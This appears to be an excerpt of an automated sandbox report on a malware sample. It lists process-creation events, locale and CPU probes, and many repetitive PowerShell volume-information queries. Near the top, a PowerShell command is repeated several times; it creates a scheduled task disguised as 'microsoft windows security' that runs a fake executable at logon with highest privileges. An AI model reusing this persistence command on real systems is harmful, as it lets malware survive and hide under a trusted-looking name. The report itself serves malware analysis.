                          Source: C:\Users\user\AppData\Local\Temp\2688734187.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F6CDD5 cpuid 9_2_00F6CDD5
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: GetLocaleInfoA,strcmp,4_2_0040E730
                          Source: C:\Windows\sysnldcvmr.exeCode function: GetLocaleInfoA,strcmp,5_2_0040E730
                          Source: C:\Windows\sysnldcvmr.exeCode function: GetLocaleInfoA,strcmp,7_2_0040E730
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: GetLocaleInfoA,24_2_009EB022
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
